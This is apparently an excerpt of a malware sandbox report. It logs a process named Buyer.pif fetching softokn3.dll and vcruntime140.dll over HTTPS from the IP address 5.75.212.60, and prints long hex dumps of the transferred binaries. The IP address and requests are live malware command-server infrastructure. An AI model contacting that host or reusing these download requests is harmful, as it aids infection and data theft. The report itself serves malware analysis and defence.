                                                                                                  2024-07-26 17:58:31 UTC16384INData Raw: 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0
                                                                                                  Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                                  2024-07-26 17:58:31 UTC16384INData Raw: 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57
                                                                                                  Data Ascii: AUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSW
                                                                                                  2024-07-26 17:58:31 UTC16384INData Raw: 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8
                                                                                                  Data Ascii: E_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ
                                                                                                  2024-07-26 17:58:31 UTC16384INData Raw: 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03
                                                                                                  Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s
                                                                                                  2024-07-26 17:58:31 UTC16384INData Raw: cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00
                                                                                                  Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|i
                                                                                                  2024-07-26 17:58:31 UTC16384INData Raw: 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01
                                                                                                  Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  14192.168.2.5497245.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:32 UTC242OUTGET /softokn3.dll HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:33 UTC260INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:32 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 257872
                                                                                                  Connection: close
                                                                                                  Last-Modified: Friday, 26-Jul-2024 17:58:32 GMT
                                                                                                  Cache-Control: no-store, no-cache
                                                                                                  Accept-Ranges: bytes
                                                                                                  2024-07-26 17:58:33 UTC16124INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                  2024-07-26 17:58:33 UTC16384INData Raw: 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81
                                                                                                  Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
                                                                                                  2024-07-26 17:58:33 UTC16384INData Raw: 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d
                                                                                                  Data Ascii: EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM
                                                                                                  2024-07-26 17:58:33 UTC16384INData Raw: 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00
                                                                                                  Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                                                  2024-07-26 17:58:33 UTC16384INData Raw: 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00
                                                                                                  Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
                                                                                                  2024-07-26 17:58:33 UTC16384INData Raw: 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74
                                                                                                  Data Ascii: ]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt
                                                                                                  2024-07-26 17:58:33 UTC16384INData Raw: 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4
                                                                                                  Data Ascii: u ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                                  2024-07-26 17:58:33 UTC16384INData Raw: 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00
                                                                                                  Data Ascii: uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                                  2024-07-26 17:58:33 UTC16384INData Raw: 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c
                                                                                                  Data Ascii: ]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|
                                                                                                  2024-07-26 17:58:33 UTC16384INData Raw: c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18
                                                                                                  Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  15192.168.2.5497255.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:34 UTC246OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:34 UTC259INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:34 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 80880
                                                                                                  Connection: close
                                                                                                  Last-Modified: Friday, 26-Jul-2024 17:58:34 GMT
                                                                                                  Cache-Control: no-store, no-cache
                                                                                                  Accept-Ranges: bytes
                                                                                                  2024-07-26 17:58:34 UTC16125INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                  2024-07-26 17:58:34 UTC16384INData Raw: 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42
                                                                                                  Data Ascii: t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;B
                                                                                                  2024-07-26 17:58:34 UTC16384INData Raw: 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20
                                                                                                  Data Ascii: EEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt
